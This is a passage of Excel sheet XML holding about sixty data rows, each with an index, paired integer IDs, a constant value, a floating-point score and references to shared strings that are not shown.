      <c r="G4334" t="s">
        <v>8566</v>
      </c>
      <c r="H4334" t="s">
        <v>8567</v>
      </c>
    </row>
    <row r="4335" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4335" s="1">
        <v>4333</v>
      </c>
      <c r="B4335">
        <v>7494</v>
      </c>
      <c r="C4335">
        <v>7494</v>
      </c>
      <c r="D4335">
        <v>2</v>
      </c>
      <c r="E4335">
        <v>0.75120002031326294</v>
      </c>
      <c r="F4335" t="s">
        <v>5592</v>
      </c>
      <c r="G4335" t="s">
        <v>8568</v>
      </c>
      <c r="H4335" t="s">
        <v>8569</v>
      </c>
    </row>
    <row r="4336" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4336" s="1">
        <v>4334</v>
      </c>
      <c r="B4336">
        <v>937</v>
      </c>
      <c r="C4336">
        <v>937</v>
      </c>
      <c r="D4336">
        <v>2</v>
      </c>
      <c r="E4336">
        <v>0.97450000047683716</v>
      </c>
      <c r="F4336" t="s">
        <v>5592</v>
      </c>
      <c r="G4336" t="s">
        <v>8570</v>
      </c>
      <c r="H4336" t="s">
        <v>8571</v>
      </c>
    </row>
    <row r="4337" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4337" s="1">
        <v>4335</v>
      </c>
      <c r="B4337">
        <v>938</v>
      </c>
      <c r="C4337">
        <v>938</v>
      </c>
      <c r="D4337">
        <v>2</v>
      </c>
      <c r="E4337">
        <v>0.86930000782012939</v>
      </c>
      <c r="F4337" t="s">
        <v>5592</v>
      </c>
      <c r="G4337" t="s">
        <v>8572</v>
      </c>
      <c r="H4337" t="s">
        <v>8573</v>
      </c>
    </row>
    <row r="4338" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4338" s="1">
        <v>4336</v>
      </c>
      <c r="B4338">
        <v>940</v>
      </c>
      <c r="C4338">
        <v>940</v>
      </c>
      <c r="D4338">
        <v>2</v>
      </c>
      <c r="E4338">
        <v>0.99709999561309814</v>
      </c>
      <c r="F4338" t="s">
        <v>5592</v>
      </c>
      <c r="G4338" t="s">
        <v>8574</v>
      </c>
      <c r="H4338" t="s">
        <v>8575</v>
      </c>
    </row>
    <row r="4339" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4339" s="1">
        <v>4337</v>
      </c>
      <c r="B4339">
        <v>7492</v>
      </c>
      <c r="C4339">
        <v>7492</v>
      </c>
      <c r="D4339">
        <v>2</v>
      </c>
      <c r="E4339">
        <v>0.53750002384185791</v>
      </c>
      <c r="F4339" t="s">
        <v>5592</v>
      </c>
      <c r="G4339" t="s">
        <v>8576</v>
      </c>
      <c r="H4339" t="s">
        <v>8577</v>
      </c>
    </row>
    <row r="4340" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4340" s="1">
        <v>4338</v>
      </c>
      <c r="B4340">
        <v>7491</v>
      </c>
      <c r="C4340">
        <v>7491</v>
      </c>
      <c r="D4340">
        <v>2</v>
      </c>
      <c r="E4340">
        <v>0.88419997692108154</v>
      </c>
      <c r="F4340" t="s">
        <v>5592</v>
      </c>
      <c r="G4340" t="s">
        <v>8578</v>
      </c>
      <c r="H4340" t="s">
        <v>8579</v>
      </c>
    </row>
    <row r="4341" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4341" s="1">
        <v>4339</v>
      </c>
      <c r="B4341">
        <v>944</v>
      </c>
      <c r="C4341">
        <v>944</v>
      </c>
      <c r="D4341">
        <v>2</v>
      </c>
      <c r="E4341">
        <v>0.59079998731613159</v>
      </c>
      <c r="F4341" t="s">
        <v>5592</v>
      </c>
      <c r="G4341" t="s">
        <v>8580</v>
      </c>
      <c r="H4341" t="s">
        <v>8581</v>
      </c>
    </row>
    <row r="4342" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4342" s="1">
        <v>4340</v>
      </c>
      <c r="B4342">
        <v>929</v>
      </c>
      <c r="C4342">
        <v>929</v>
      </c>
      <c r="D4342">
        <v>2</v>
      </c>
      <c r="E4342">
        <v>0.76590001583099365</v>
      </c>
      <c r="F4342" t="s">
        <v>5592</v>
      </c>
      <c r="G4342" t="s">
        <v>8582</v>
      </c>
      <c r="H4342" t="s">
        <v>8583</v>
      </c>
    </row>
    <row r="4343" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4343" s="1">
        <v>4341</v>
      </c>
      <c r="B4343">
        <v>945</v>
      </c>
      <c r="C4343">
        <v>945</v>
      </c>
      <c r="D4343">
        <v>2</v>
      </c>
      <c r="E4343">
        <v>0.54110002517700195</v>
      </c>
      <c r="F4343" t="s">
        <v>5592</v>
      </c>
      <c r="G4343" t="s">
        <v>8584</v>
      </c>
      <c r="H4343" t="s">
        <v>8585</v>
      </c>
    </row>
    <row r="4344" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4344" s="1">
        <v>4342</v>
      </c>
      <c r="B4344">
        <v>7486</v>
      </c>
      <c r="C4344">
        <v>7486</v>
      </c>
      <c r="D4344">
        <v>2</v>
      </c>
      <c r="E4344">
        <v>0.55570000410079956</v>
      </c>
      <c r="F4344" t="s">
        <v>5592</v>
      </c>
      <c r="G4344" t="s">
        <v>8586</v>
      </c>
      <c r="H4344" t="s">
        <v>8587</v>
      </c>
    </row>
    <row r="4345" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4345" s="1">
        <v>4343</v>
      </c>
      <c r="B4345">
        <v>953</v>
      </c>
      <c r="C4345">
        <v>953</v>
      </c>
      <c r="D4345">
        <v>2</v>
      </c>
      <c r="E4345">
        <v>0.80510002374649048</v>
      </c>
      <c r="F4345" t="s">
        <v>5592</v>
      </c>
      <c r="G4345" t="s">
        <v>8588</v>
      </c>
      <c r="H4345" t="s">
        <v>8589</v>
      </c>
    </row>
    <row r="4346" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4346" s="1">
        <v>4344</v>
      </c>
      <c r="B4346">
        <v>955</v>
      </c>
      <c r="C4346">
        <v>955</v>
      </c>
      <c r="D4346">
        <v>2</v>
      </c>
      <c r="E4346">
        <v>0.944100022315979</v>
      </c>
      <c r="F4346" t="s">
        <v>5592</v>
      </c>
      <c r="G4346" t="s">
        <v>8590</v>
      </c>
      <c r="H4346" t="s">
        <v>8591</v>
      </c>
    </row>
    <row r="4347" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4347" s="1">
        <v>4345</v>
      </c>
      <c r="B4347">
        <v>7484</v>
      </c>
      <c r="C4347">
        <v>7484</v>
      </c>
      <c r="D4347">
        <v>2</v>
      </c>
      <c r="E4347">
        <v>0.86680001020431519</v>
      </c>
      <c r="F4347" t="s">
        <v>5592</v>
      </c>
      <c r="G4347" t="s">
        <v>8592</v>
      </c>
      <c r="H4347" t="s">
        <v>8593</v>
      </c>
    </row>
    <row r="4348" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4348" s="1">
        <v>4346</v>
      </c>
      <c r="B4348">
        <v>957</v>
      </c>
      <c r="C4348">
        <v>957</v>
      </c>
      <c r="D4348">
        <v>2</v>
      </c>
      <c r="E4348">
        <v>0.79339998960494995</v>
      </c>
      <c r="F4348" t="s">
        <v>5592</v>
      </c>
      <c r="G4348" t="s">
        <v>8594</v>
      </c>
      <c r="H4348" t="s">
        <v>8595</v>
      </c>
    </row>
    <row r="4349" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4349" s="1">
        <v>4347</v>
      </c>
      <c r="B4349">
        <v>958</v>
      </c>
      <c r="C4349">
        <v>958</v>
      </c>
      <c r="D4349">
        <v>2</v>
      </c>
      <c r="E4349">
        <v>0.79699999094009399</v>
      </c>
      <c r="F4349" t="s">
        <v>5592</v>
      </c>
      <c r="G4349" t="s">
        <v>8596</v>
      </c>
      <c r="H4349" t="s">
        <v>8597</v>
      </c>
    </row>
    <row r="4350" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4350" s="1">
        <v>4348</v>
      </c>
      <c r="B4350">
        <v>959</v>
      </c>
      <c r="C4350">
        <v>959</v>
      </c>
      <c r="D4350">
        <v>2</v>
      </c>
      <c r="E4350">
        <v>0.84619998931884766</v>
      </c>
      <c r="F4350" t="s">
        <v>5592</v>
      </c>
      <c r="G4350" t="s">
        <v>8598</v>
      </c>
      <c r="H4350" t="s">
        <v>8599</v>
      </c>
    </row>
    <row r="4351" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4351" s="1">
        <v>4349</v>
      </c>
      <c r="B4351">
        <v>962</v>
      </c>
      <c r="C4351">
        <v>962</v>
      </c>
      <c r="D4351">
        <v>2</v>
      </c>
      <c r="E4351">
        <v>0.76130002737045288</v>
      </c>
      <c r="F4351" t="s">
        <v>5592</v>
      </c>
      <c r="G4351" t="s">
        <v>8600</v>
      </c>
      <c r="H4351" t="s">
        <v>8601</v>
      </c>
    </row>
    <row r="4352" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4352" s="1">
        <v>4350</v>
      </c>
      <c r="B4352">
        <v>973</v>
      </c>
      <c r="C4352">
        <v>973</v>
      </c>
      <c r="D4352">
        <v>2</v>
      </c>
      <c r="E4352">
        <v>0.89829999208450317</v>
      </c>
      <c r="F4352" t="s">
        <v>5592</v>
      </c>
      <c r="G4352" t="s">
        <v>8602</v>
      </c>
      <c r="H4352" t="s">
        <v>8603</v>
      </c>
    </row>
    <row r="4353" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4353" s="1">
        <v>4351</v>
      </c>
      <c r="B4353">
        <v>975</v>
      </c>
      <c r="C4353">
        <v>975</v>
      </c>
      <c r="D4353">
        <v>2</v>
      </c>
      <c r="E4353">
        <v>0.85689997673034668</v>
      </c>
      <c r="F4353" t="s">
        <v>5592</v>
      </c>
      <c r="G4353" t="s">
        <v>8604</v>
      </c>
      <c r="H4353" t="s">
        <v>8605</v>
      </c>
    </row>
    <row r="4354" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4354" s="1">
        <v>4352</v>
      </c>
      <c r="B4354">
        <v>949</v>
      </c>
      <c r="C4354">
        <v>949</v>
      </c>
      <c r="D4354">
        <v>2</v>
      </c>
      <c r="E4354">
        <v>0.99419999122619629</v>
      </c>
      <c r="F4354" t="s">
        <v>5592</v>
      </c>
      <c r="G4354" t="s">
        <v>8606</v>
      </c>
      <c r="H4354" t="s">
        <v>8607</v>
      </c>
    </row>
    <row r="4355" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4355" s="1">
        <v>4353</v>
      </c>
      <c r="B4355">
        <v>7556</v>
      </c>
      <c r="C4355">
        <v>7556</v>
      </c>
      <c r="D4355">
        <v>2</v>
      </c>
      <c r="E4355">
        <v>0.99599999189376831</v>
      </c>
      <c r="F4355" t="s">
        <v>5592</v>
      </c>
      <c r="G4355" t="s">
        <v>8608</v>
      </c>
      <c r="H4355" t="s">
        <v>8609</v>
      </c>
    </row>
    <row r="4356" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4356" s="1">
        <v>4354</v>
      </c>
      <c r="B4356">
        <v>928</v>
      </c>
      <c r="C4356">
        <v>928</v>
      </c>
      <c r="D4356">
        <v>2</v>
      </c>
      <c r="E4356">
        <v>0.69169998168945313</v>
      </c>
      <c r="F4356" t="s">
        <v>5592</v>
      </c>
      <c r="G4356" t="s">
        <v>8610</v>
      </c>
      <c r="H4356" t="s">
        <v>8611</v>
      </c>
    </row>
    <row r="4357" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4357" s="1">
        <v>4355</v>
      </c>
      <c r="B4357">
        <v>926</v>
      </c>
      <c r="C4357">
        <v>926</v>
      </c>
      <c r="D4357">
        <v>2</v>
      </c>
      <c r="E4357">
        <v>0.97909998893737793</v>
      </c>
      <c r="F4357" t="s">
        <v>5592</v>
      </c>
      <c r="G4357" t="s">
        <v>8612</v>
      </c>
      <c r="H4357" t="s">
        <v>8613</v>
      </c>
    </row>
    <row r="4358" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4358" s="1">
        <v>4356</v>
      </c>
      <c r="B4358">
        <v>889</v>
      </c>
      <c r="C4358">
        <v>889</v>
      </c>
      <c r="D4358">
        <v>2</v>
      </c>
      <c r="E4358">
        <v>0.99809998273849487</v>
      </c>
      <c r="F4358" t="s">
        <v>5592</v>
      </c>
      <c r="G4358" t="s">
        <v>8614</v>
      </c>
      <c r="H4358" t="s">
        <v>8615</v>
      </c>
    </row>
    <row r="4359" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4359" s="1">
        <v>4357</v>
      </c>
      <c r="B4359">
        <v>7509</v>
      </c>
      <c r="C4359">
        <v>7509</v>
      </c>
      <c r="D4359">
        <v>2</v>
      </c>
      <c r="E4359">
        <v>0.99470001459121704</v>
      </c>
      <c r="F4359" t="s">
        <v>5592</v>
      </c>
      <c r="G4359" t="s">
        <v>8616</v>
      </c>
      <c r="H4359" t="s">
        <v>8617</v>
      </c>
    </row>
    <row r="4360" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4360" s="1">
        <v>4358</v>
      </c>
      <c r="B4360">
        <v>7508</v>
      </c>
      <c r="C4360">
        <v>7508</v>
      </c>
      <c r="D4360">
        <v>2</v>
      </c>
      <c r="E4360">
        <v>0.98500001430511475</v>
      </c>
      <c r="F4360" t="s">
        <v>5592</v>
      </c>
      <c r="G4360" t="s">
        <v>8618</v>
      </c>
      <c r="H4360" t="s">
        <v>8619</v>
      </c>
    </row>
    <row r="4361" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4361" s="1">
        <v>4359</v>
      </c>
      <c r="B4361">
        <v>893</v>
      </c>
      <c r="C4361">
        <v>893</v>
      </c>
      <c r="D4361">
        <v>2</v>
      </c>
      <c r="E4361">
        <v>0.95359998941421509</v>
      </c>
      <c r="F4361" t="s">
        <v>5592</v>
      </c>
      <c r="G4361" t="s">
        <v>8620</v>
      </c>
      <c r="H4361" t="s">
        <v>8621</v>
      </c>
    </row>
    <row r="4362" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4362" s="1">
        <v>4360</v>
      </c>
      <c r="B4362">
        <v>7507</v>
      </c>
      <c r="C4362">
        <v>7507</v>
      </c>
      <c r="D4362">
        <v>2</v>
      </c>
      <c r="E4362">
        <v>0.99750000238418579</v>
      </c>
      <c r="F4362" t="s">
        <v>5592</v>
      </c>
      <c r="G4362" t="s">
        <v>8622</v>
      </c>
      <c r="H4362" t="s">
        <v>8623</v>
      </c>
    </row>
    <row r="4363" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4363" s="1">
        <v>4361</v>
      </c>
      <c r="B4363">
        <v>895</v>
      </c>
      <c r="C4363">
        <v>895</v>
      </c>
      <c r="D4363">
        <v>2</v>
      </c>
      <c r="E4363">
        <v>0.99570000171661377</v>
      </c>
      <c r="F4363" t="s">
        <v>5592</v>
      </c>
      <c r="G4363" t="s">
        <v>8624</v>
      </c>
      <c r="H4363" t="s">
        <v>8625</v>
      </c>
    </row>
    <row r="4364" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4364" s="1">
        <v>4362</v>
      </c>
      <c r="B4364">
        <v>896</v>
      </c>
      <c r="C4364">
        <v>896</v>
      </c>
      <c r="D4364">
        <v>2</v>
      </c>
      <c r="E4364">
        <v>0.99089998006820679</v>
      </c>
      <c r="F4364" t="s">
        <v>5592</v>
      </c>
      <c r="G4364" t="s">
        <v>8626</v>
      </c>
      <c r="H4364" t="s">
        <v>8627</v>
      </c>
    </row>
    <row r="4365" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4365" s="1">
        <v>4363</v>
      </c>
      <c r="B4365">
        <v>7506</v>
      </c>
      <c r="C4365">
        <v>7506</v>
      </c>
      <c r="D4365">
        <v>2</v>
      </c>
      <c r="E4365">
        <v>0.99739998579025269</v>
      </c>
      <c r="F4365" t="s">
        <v>5592</v>
      </c>
      <c r="G4365" t="s">
        <v>8628</v>
      </c>
      <c r="H4365" t="s">
        <v>8629</v>
      </c>
    </row>
    <row r="4366" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4366" s="1">
        <v>4364</v>
      </c>
      <c r="B4366">
        <v>899</v>
      </c>
      <c r="C4366">
        <v>899</v>
      </c>
      <c r="D4366">
        <v>2</v>
      </c>
      <c r="E4366">
        <v>0.47420001029968262</v>
      </c>
      <c r="F4366" t="s">
        <v>5592</v>
      </c>
      <c r="G4366" t="s">
        <v>8630</v>
      </c>
      <c r="H4366" t="s">
        <v>8631</v>
      </c>
    </row>
    <row r="4367" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4367" s="1">
        <v>4365</v>
      </c>
      <c r="B4367">
        <v>7505</v>
      </c>
      <c r="C4367">
        <v>7505</v>
      </c>
      <c r="D4367">
        <v>2</v>
      </c>
      <c r="E4367">
        <v>0.99919998645782471</v>
      </c>
      <c r="F4367" t="s">
        <v>5592</v>
      </c>
      <c r="G4367" t="s">
        <v>8632</v>
      </c>
      <c r="H4367" t="s">
        <v>8633</v>
      </c>
    </row>
    <row r="4368" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4368" s="1">
        <v>4366</v>
      </c>
      <c r="B4368">
        <v>927</v>
      </c>
      <c r="C4368">
        <v>927</v>
      </c>
      <c r="D4368">
        <v>2</v>
      </c>
      <c r="E4368">
        <v>0.96649998426437378</v>
      </c>
      <c r="F4368" t="s">
        <v>5592</v>
      </c>
      <c r="G4368" t="s">
        <v>8634</v>
      </c>
      <c r="H4368" t="s">
        <v>8635</v>
      </c>
    </row>
    <row r="4369" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4369" s="1">
        <v>4367</v>
      </c>
      <c r="B4369">
        <v>7503</v>
      </c>
      <c r="C4369">
        <v>7503</v>
      </c>
      <c r="D4369">
        <v>2</v>
      </c>
      <c r="E4369">
        <v>0.99870002269744873</v>
      </c>
      <c r="F4369" t="s">
        <v>5592</v>
      </c>
      <c r="G4369" t="s">
        <v>8636</v>
      </c>
      <c r="H4369" t="s">
        <v>8637</v>
      </c>
    </row>
    <row r="4370" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4370" s="1">
        <v>4368</v>
      </c>
      <c r="B4370">
        <v>908</v>
      </c>
      <c r="C4370">
        <v>908</v>
      </c>
      <c r="D4370">
        <v>2</v>
      </c>
      <c r="E4370">
        <v>0.99739998579025269</v>
      </c>
      <c r="F4370" t="s">
        <v>5592</v>
      </c>
      <c r="G4370" t="s">
        <v>8638</v>
      </c>
      <c r="H4370" t="s">
        <v>8639</v>
      </c>
    </row>
    <row r="4371" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4371" s="1">
        <v>4369</v>
      </c>
      <c r="B4371">
        <v>909</v>
      </c>
      <c r="C4371">
        <v>909</v>
      </c>
      <c r="D4371">
        <v>2</v>
      </c>
      <c r="E4371">
        <v>0.9968000054359436</v>
      </c>
      <c r="F4371" t="s">
        <v>5592</v>
      </c>
      <c r="G4371" t="s">
        <v>8640</v>
      </c>
      <c r="H4371" t="s">
        <v>8641</v>
      </c>
    </row>
    <row r="4372" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4372" s="1">
        <v>4370</v>
      </c>
      <c r="B4372">
        <v>7500</v>
      </c>
      <c r="C4372">
        <v>7500</v>
      </c>
      <c r="D4372">
        <v>2</v>
      </c>
      <c r="E4372">
        <v>0.99750000238418579</v>
      </c>
      <c r="F4372" t="s">
        <v>5592</v>
      </c>
      <c r="G4372" t="s">
        <v>8642</v>
      </c>
      <c r="H4372" t="s">
        <v>8643</v>
      </c>
    </row>
    <row r="4373" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4373" s="1">
        <v>4371</v>
      </c>
      <c r="B4373">
        <v>914</v>
      </c>
      <c r="C4373">
        <v>914</v>
      </c>
      <c r="D4373">
        <v>2</v>
      </c>
      <c r="E4373">
        <v>0.82889997959136963</v>
      </c>
      <c r="F4373" t="s">
        <v>5592</v>
      </c>
      <c r="G4373" t="s">
        <v>8644</v>
      </c>
      <c r="H4373" t="s">
        <v>8645</v>
      </c>
    </row>
    <row r="4374" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4374" s="1">
        <v>4372</v>
      </c>
      <c r="B4374">
        <v>915</v>
      </c>
      <c r="C4374">
        <v>915</v>
      </c>
      <c r="D4374">
        <v>2</v>
      </c>
      <c r="E4374">
        <v>0.76319998502731323</v>
      </c>
      <c r="F4374" t="s">
        <v>5592</v>
      </c>
      <c r="G4374" t="s">
        <v>8646</v>
      </c>
      <c r="H4374" t="s">
        <v>8647</v>
      </c>
    </row>
    <row r="4375" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4375" s="1">
        <v>4373</v>
      </c>
      <c r="B4375">
        <v>916</v>
      </c>
      <c r="C4375">
        <v>916</v>
      </c>
      <c r="D4375">
        <v>2</v>
      </c>
      <c r="E4375">
        <v>0.99750000238418579</v>
      </c>
      <c r="F4375" t="s">
        <v>5592</v>
      </c>
      <c r="G4375" t="s">
        <v>8648</v>
      </c>
      <c r="H4375" t="s">
        <v>8649</v>
      </c>
    </row>
    <row r="4376" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4376" s="1">
        <v>4374</v>
      </c>
      <c r="B4376">
        <v>917</v>
      </c>
      <c r="C4376">
        <v>917</v>
      </c>
      <c r="D4376">
        <v>2</v>
      </c>
      <c r="E4376">
        <v>0.69709998369216919</v>
      </c>
      <c r="F4376" t="s">
        <v>5592</v>
      </c>
      <c r="G4376" t="s">
        <v>8650</v>
      </c>
      <c r="H4376" t="s">
        <v>8651</v>
      </c>
    </row>
    <row r="4377" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4377" s="1">
        <v>4375</v>
      </c>
      <c r="B4377">
        <v>918</v>
      </c>
      <c r="C4377">
        <v>918</v>
      </c>
      <c r="D4377">
        <v>2</v>
      </c>
      <c r="E4377">
        <v>0.68940001726150513</v>
      </c>
      <c r="F4377" t="s">
        <v>5592</v>
      </c>
      <c r="G4377" t="s">
        <v>8652</v>
      </c>
      <c r="H4377" t="s">
        <v>8653</v>
      </c>
    </row>
    <row r="4378" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4378" s="1">
        <v>4376</v>
      </c>
      <c r="B4378">
        <v>919</v>
      </c>
      <c r="C4378">
        <v>919</v>
      </c>
      <c r="D4378">
        <v>2</v>
      </c>
      <c r="E4378">
        <v>0.5593000054359436</v>
      </c>
      <c r="F4378" t="s">
        <v>5592</v>
      </c>
      <c r="G4378" t="s">
        <v>8654</v>
      </c>
      <c r="H4378" t="s">
        <v>8655</v>
      </c>
    </row>
    <row r="4379" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4379" s="1">
        <v>4377</v>
      </c>
      <c r="B4379">
        <v>925</v>
      </c>
      <c r="C4379">
        <v>925</v>
      </c>
      <c r="D4379">
        <v>2</v>
      </c>
      <c r="E4379">
        <v>0.46939998865127558</v>
      </c>
      <c r="F4379" t="s">
        <v>5592</v>
      </c>
      <c r="G4379" t="s">
        <v>8656</v>
      </c>
      <c r="H4379" t="s">
        <v>8657</v>
      </c>
    </row>
    <row r="4380" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4380" s="1">
        <v>4378</v>
      </c>
      <c r="B4380">
        <v>906</v>
      </c>
      <c r="C4380">
        <v>906</v>
      </c>
      <c r="D4380">
        <v>2</v>
      </c>
      <c r="E4380">
        <v>0.93330001831054688</v>
      </c>
      <c r="F4380" t="s">
        <v>5592</v>
      </c>
      <c r="G4380" t="s">
        <v>8658</v>
      </c>
      <c r="H4380" t="s">
        <v>8659</v>
      </c>
    </row>
    <row r="4381" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4381" s="1">
        <v>4379</v>
      </c>
      <c r="B4381">
        <v>523</v>
      </c>
      <c r="C4381">
        <v>523</v>
      </c>
      <c r="D4381">
        <v>2</v>
      </c>
      <c r="E4381">
        <v>0.64880001544952393</v>
      </c>
      <c r="F4381" t="s">
        <v>5592</v>
      </c>
      <c r="G4381" t="s">
        <v>8660</v>
      </c>
      <c r="H4381" t="s">
        <v>8661</v>
      </c>
    </row>
    <row r="4382" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4382" s="1">
        <v>4380</v>
      </c>
      <c r="B4382">
        <v>786</v>
      </c>
      <c r="C4382">
        <v>786</v>
      </c>
      <c r="D4382">
        <v>2</v>
      </c>
      <c r="E4382">
        <v>0.99790000915527344</v>
      </c>
      <c r="F4382" t="s">
        <v>5592</v>
      </c>
      <c r="G4382" t="s">
        <v>8662</v>
      </c>
      <c r="H4382" t="s">
        <v>8663</v>
      </c>
    </row>
    <row r="4383" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4383" s="1">
        <v>4381</v>
      </c>
      <c r="B4383">
        <v>784</v>
      </c>
      <c r="C4383">
        <v>784</v>
      </c>
      <c r="D4383">
        <v>2</v>
      </c>
      <c r="E4383">
        <v>0.85780000686645508</v>
      </c>
      <c r="F4383" t="s">
        <v>5592</v>
      </c>
      <c r="G4383" t="s">
        <v>8664</v>
      </c>
      <c r="H4383" t="s">
        <v>8665</v>
      </c>
    </row>
    <row r="4384" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4384" s="1">
        <v>4382</v>
      </c>
      <c r="B4384">
        <v>579</v>
      </c>
      <c r="C4384">
        <v>579</v>
      </c>
      <c r="D4384">
        <v>2</v>
      </c>
      <c r="E4384">
        <v>0.95789998769760132</v>
      </c>
      <c r="F4384" t="s">
        <v>5592</v>
      </c>
      <c r="G4384" t="s">
        <v>8666</v>
      </c>
      <c r="H4384" t="s">
        <v>8667</v>
      </c>
    </row>
    <row r="4385" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4385" s="1">
        <v>4383</v>
      </c>
      <c r="B4385">
        <v>581</v>
      </c>
      <c r="C4385">
        <v>581</v>
      </c>
      <c r="D4385">
        <v>2</v>
      </c>
      <c r="E4385">
        <v>0.62139999866485596</v>
      </c>
      <c r="F4385" t="s">
        <v>5592</v>
      </c>
      <c r="G4385" t="s">
        <v>8668</v>
      </c>
      <c r="H4385" t="s">
        <v>8669</v>
      </c>
    </row>
    <row r="4386" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4386" s="1">
        <v>4384</v>
      </c>
      <c r="B4386">
        <v>582</v>
      </c>
      <c r="C4386">
        <v>582</v>
      </c>
      <c r="D4386">
        <v>2</v>
      </c>
      <c r="E4386">
        <v>0.93720000982284546</v>
      </c>
      <c r="F4386" t="s">
        <v>5592</v>
      </c>
      <c r="G4386" t="s">
        <v>8670</v>
      </c>
      <c r="H4386" t="s">
        <v>8671</v>
      </c>
    </row>
    <row r="4387" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4387" s="1">
        <v>4385</v>
      </c>
      <c r="B4387">
        <v>584</v>
      </c>
      <c r="C4387">
        <v>584</v>
      </c>
      <c r="D4387">
        <v>2</v>
      </c>
      <c r="E4387">
        <v>0.72960001230239868</v>
      </c>
      <c r="F4387" t="s">
        <v>5592</v>
      </c>
      <c r="G4387" t="s">
        <v>8672</v>
      </c>
      <c r="H4387" t="s">
        <v>8673</v>
      </c>
    </row>
    <row r="4388" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4388" s="1">
        <v>4386</v>
      </c>
      <c r="B4388">
        <v>585</v>
      </c>
      <c r="C4388">
        <v>585</v>
      </c>
      <c r="D4388">
        <v>2</v>
      </c>
      <c r="E4388">
        <v>0.99610000848770142</v>
      </c>
      <c r="F4388" t="s">
        <v>5592</v>
      </c>
      <c r="G4388" t="s">
        <v>8674</v>
      </c>
      <c r="H4388" t="s">
        <v>8675</v>
      </c>
    </row>
    <row r="4389" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4389" s="1">
        <v>4387</v>
      </c>
      <c r="B4389">
        <v>586</v>
      </c>
      <c r="C4389">
        <v>586</v>
      </c>
      <c r="D4389">
        <v>2</v>
      </c>
      <c r="E4389">
        <v>0.41940000653266912</v>
      </c>
      <c r="F4389" t="s">
        <v>5592</v>
      </c>
      <c r="G4389" t="s">
        <v>8676</v>
      </c>
      <c r="H4389" t="s">
        <v>8677</v>
      </c>
    </row>
    <row r="4390" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4390" s="1">
        <v>4388</v>
      </c>
      <c r="B4390">
        <v>587</v>
      </c>
      <c r="C4390">
        <v>587</v>
      </c>
      <c r="D4390">
        <v>2</v>
      </c>
      <c r="E4390">
        <v>0.88510000705718994</v>
      </c>
      <c r="F4390" t="s">
        <v>5592</v>
      </c>
      <c r="G4390" t="s">
        <v>8678</v>
      </c>
      <c r="H4390" t="s">
        <v>8679</v>
      </c>
    </row>
    <row r="4391" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4391" s="1">
        <v>4389</v>
      </c>
      <c r="B4391">
        <v>595</v>
      </c>
      <c r="C4391">
        <v>595</v>
      </c>
      <c r="D4391">
        <v>2</v>
      </c>
      <c r="E4391">
        <v>0.53539997339248657</v>
      </c>
      <c r="F4391" t="s">
        <v>5592</v>
      </c>
      <c r="G4391" t="s">
        <v>8680</v>
      </c>
      <c r="H4391" t="s">
        <v>8681</v>
      </c>
    </row>
    <row r="4392" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4392" s="1">
        <v>4390</v>
      </c>
      <c r="B4392">
        <v>602</v>
      </c>
      <c r="C4392">
        <v>602</v>
      </c>
      <c r="D4392">
        <v>2</v>
      </c>
      <c r="E4392">
        <v>0.58139997720718384</v>
      </c>
      <c r="F4392" t="s">
        <v>5592</v>
      </c>
      <c r="G4392" t="s">
        <v>8682</v>
      </c>
      <c r="H4392" t="s">
        <v>8683</v>
      </c>
    </row>
    <row r="4393" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4393" s="1">
        <v>4391</v>
      </c>
      <c r="B4393">
        <v>7661</v>
      </c>
      <c r="C4393">
        <v>7661</v>
      </c>
      <c r="D4393">
